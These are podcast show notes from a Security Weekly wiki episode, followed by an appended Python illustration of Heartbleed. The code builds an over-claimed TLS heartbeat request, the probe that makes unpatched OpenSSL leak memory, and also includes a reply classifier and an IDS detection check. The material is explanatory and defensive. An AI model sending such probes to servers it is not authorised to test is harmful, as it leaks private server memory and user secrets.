From Security Weekly Wiki

Episode Media

MP3 pt1

MP3 pt2

MP3 pt3


Paul's Security Weekly - Episode 371 for Thursday May 1st, 2014

  • This segment is sponsored by Palo Alto Networks creators of THE next-generation firewalls, helping you enforce network security policies based on applications, users, and content. Visit them on the web at www.paloaltonetworks.com
  • and by Tenable Network Security, the creators of Nessus, the world's best vulnerability scanner. Check out Tenable's other cool products such as the Passive Vulnerability Scanner and SecurityCenter Continuous View. Visit them on the web at www.tenable.com

Guest Interview: Adam Shostack


Adam Shostack is part of Microsoft's Security Development Lifecycle strategy team, where he is responsible for security design analysis techniques. Before Microsoft, Adam was involved in a number of successful start-ups focused on vulnerability scanning, privacy, and program analysis. He is an accomplished writer and speaker. His most recent book is the excellent "Threat Modeling: Designing for Security".

Five Questions

  1. Three words to describe yourself
  2. If you were a serial killer, what would be your weapon of choice?
  3. If you wrote a book about yourself, what would the title be?
  4. In the popular game of Ass Grabby Grabby do you prefer to go first or second?
  5. If you could have dinner with one celebrity, who would it be?

Ed Skoudis

  • This segment is brought to you by The SANS Institute, the most trusted source for computer security training, certification and research. Visit www.sans.org to learn more.


Ed Skoudis is the founder of Counter Hack, an innovative organization that designs, builds, and operates popular infosec challenges and simulations including CyberCity, NetWars, Cyber Quests, and Cyber Foundations. As director of the CyberCity project, Ed oversees the development of missions which help train cyber warriors in how to defend the kinetic assets of a physical, miniaturized city. Ed's expertise includes hacker attacks and defenses, incident response, and malware analysis, with over fifteen years of experience in information security. Ed authored and regularly teaches the SANS courses on network penetration testing.


  • This segment is brought to you by http://www.blacksquirrel.io/ - Pentest Networks from Your Browser! Exploit the limits of network security through just a browser. Have a Chrome exploit in your toolkit? Good, but for the rest of us there's Black Squirrel. Visit blacksquirrel.io for more information.
  • and by Onapsis the leading provider of solutions to protect ERP systems from cyber-attacks. Customers can secure their SAP and Oracle business-critical platforms from espionage, sabotage and financial fraud risks. Visit them on the web at http://www.onapsis.com/
  • and by Pwnie Express - Check out the community edition and turn your Nexus 7 into a lean and mean pen testing machine. For all those hard to reach places, there's Pwnie Express, visit them on the web at pwnieexpress.com
  • CircleCityCon is the first hacker con in Indianapolis. It is in a small to medium sized venue located in the heart of Indianapolis. General admission tickets: Jan 1, 2014 until sold out. When: June 13-15, 2014.

Paul's Stories

  1. Google stops scanning Gmail messages for ads in Apps for Education - Network World - By scanning, they mean looking at the content and producing ads. Yuk. But good for students.
  2. Hacking Traffic Systems for Fun and Chaos - I've heard stories about hacking traffic systems. Are they wireless? Anyone? In any case, this can cause chaos, but you can also use it if you want to rob a bank and make a super fast get away. Maybe. I don't see how you could profit, $$ wise anyhow, from it.
  3. Windows XP Systems Also Get Out-of-Band IE Zero-Day Patch - "We will not issue patches for XP any longer". Oh wait, "Well, okay maybe just this one time". While this helps protect people from harm, it does little to foster migration to a more modern operating system.
  4. Popular Ad Blocker Drops Support for IE6 and IE7 - This is going to happen more and more, what happens when ad blockers, AV and whitelisting software starts dropping support for older technology? If this doesn't light a fire, I don't know what does.
  5. What a Toilet Hoax Can Tell Us About the Future of Surveillance - Jennifer Golbeck - The Atlantic - Yea, okay, this was a hoax telling people that data was being collected from the toilets about "deposits" being made and reporting that back anonymously for public health, including analyzing samples for disease. Let's put the Tosh.0 30 seconds on the clock and see how many inappropriate toilet jokes we can make: "Well, that's pretty shitty. I'm so tired of people collecting my personal shit. This has to piss people off. Gives new meaning to taking a shit. I can't believe we let them get away with this shit. I guess in the end, they were full of shit."
  6. Black Hills Information Security, THE source for all of your penetration testing needs. Please visit www.blackhillsinfosec.com for more information and use the contact page to request a quote!
  7. JTAG Slides - Awesome presentation from my hero, Craig Heffner. #mancrush
  8. Fun with IDS funtime #3: heartbleed - Turns out IDS really is dead.
  9. The Rise of the Insider in a Collaborative IT World - Do we have to talk about insider threat again?
  10. AOL Subscriber Data Stolen: You've Got Pwned - Who the f**k still uses AOL? Oh, 2.5 million people. How many of those are active users though?

Larry's Stories

  1. Target and Chip-and-pin - Target looking to move to chip and pin, and fast. The problem that I can see is that yes, great, all of the readers will support it, but the only cards they can get semi-fast support for is the Target branded cards….what about every other card used out there?
  2. IE 0-day - All the way from IE 6 to 11. Turns out that Microsoft is releasing patches for XP. Uhhh, MS, unsupported, I don't think that word means what you think it does. Same for EOL.

Jack's Stories

Joff's Stories

  1. https://bitbucket.org/jsthyer/powerbleed - A PowerShell module to check for the OpenSSL heartbleed vulnerability and bleed out data if you want it. Please check it out but be very careful with testing embedded systems.
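Joff's powerbleed item and Paul's "Fun with IDS funtime #3: heartbleed" item both come down to the same few bytes of protocol, so here is an added illustration of the heartbeat layer in Python. This is not code from the page and not Joff's module: it builds the over-claimed HeartbeatRequest a Heartbleed probe sends, applies the RFC 6520 length rule an IDS can use to flag that request on the wire, and classifies the reply a server gives. The TLS handshake that must precede a real probe is left to the tool or a TLS library and is not shown. The sample records, the 16-byte over-claim, and the helper names are my own assumptions.

```python
import struct

# TLS record / Heartbeat constants (RFC 5246, RFC 6520)
TLS_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
HB_MIN_PADDING = 16          # RFC 6520: every heartbeat carries >= 16 bytes of padding


def build_heartbeat(claimed_len, payload=b"", msg_type=HB_REQUEST, version=(3, 1)):
    """Wrap a Heartbeat message in a TLS record.

    claimed_len is the 2-byte payload_length field. A Heartbleed probe sets it
    larger than len(payload); an unpatched OpenSSL copies claimed_len bytes out
    of its own memory into the response instead of validating the field.
    """
    body = struct.pack("!BH", msg_type, claimed_len) + payload
    hdr = struct.pack("!BBBH", TLS_HEARTBEAT, version[0], version[1], len(body))
    return hdr + body


def parse_record(data):
    """Return the first TLS record in data as a dict, or None without a full header."""
    if len(data) < 5:
        return None
    ctype, vmaj, vmin, rlen = struct.unpack("!BBBH", data[:5])
    return {"type": ctype, "version": (vmaj, vmin),
            "body": data[5:5 + rlen], "complete": len(data) - 5 >= rlen}


def heartbeat_is_malformed(record):
    """IDS-style check on one heartbeat record.

    RFC 6520 requires 1 (type) + 2 (length) + payload_length + >=16 padding to
    fit inside the record, so a declared length that does not fit is exactly
    the condition that triggers the over-read. Returns False for non-heartbeats.
    """
    if record is None or record["type"] != TLS_HEARTBEAT:
        return False
    body = record["body"]
    if len(body) < 3:
        return True                        # truncated: no room for type + length
    _, plen = struct.unpack("!BH", body[:3])
    return 3 + plen + HB_MIN_PADDING > len(body)


def assess_reply(sent_payload, reply):
    """Classify what came back after a probe with an over-claimed length.

    'vulnerable'         : HeartbeatResponse echoed more bytes than we sent
    'no_heartbeat_reply' : nothing came back (patched OpenSSL drops the request
                           silently, but a hung embedded device looks the same)
    'inconclusive'       : some other record, or an echo of the right size
    """
    rec = parse_record(reply)
    if rec is None:
        return "no_heartbeat_reply"
    if rec["type"] != TLS_HEARTBEAT or len(rec["body"]) < 3:
        return "inconclusive"
    mtype, _ = struct.unpack("!BH", rec["body"][:3])
    echoed = rec["body"][3:]
    if mtype == HB_RESPONSE and len(echoed) > len(sent_payload):
        return "vulnerable"
    return "inconclusive"


# Constructed sample traffic (not a capture). The probe over-claims by only 16
# bytes, which is enough to prove the over-read without asking a fragile
# embedded TLS stack for 64 KB of its heap in one go.
PROBE_PAYLOAD = b"abc"
PROBE = build_heartbeat(len(PROBE_PAYLOAD) + 16, PROBE_PAYLOAD)
VULN_REPLY = build_heartbeat(len(PROBE_PAYLOAD) + 16,
                             PROBE_PAYLOAD + b"\x00" * 16,   # zeros stand in for leaked memory
                             HB_RESPONSE)
PATCHED_REPLY = b""
LEGIT_HEARTBEAT = build_heartbeat(3, b"abc" + b"\x00" * HB_MIN_PADDING)

if __name__ == "__main__":
    print("probe flagged by IDS check:", heartbeat_is_malformed(parse_record(PROBE)))
    print("legit heartbeat flagged:  ", heartbeat_is_malformed(parse_record(LEGIT_HEARTBEAT)))
    print("vulnerable server reply:  ", assess_reply(PROBE_PAYLOAD, VULN_REPLY))
    print("patched server reply:     ", assess_reply(PROBE_PAYLOAD, PATCHED_REPLY))
```

Two practical points follow from the code. First, the length rule in `heartbeat_is_malformed` only works if the sensor sees the heartbeat in the clear, which is why the item on IDS and heartbleed matters: once the handshake is complete the heartbeat rides inside encrypted records and the check has nothing to inspect. Second, a missing reply does not prove a host is patched; start with a small over-claim like the one above before asking an embedded device for anything larger.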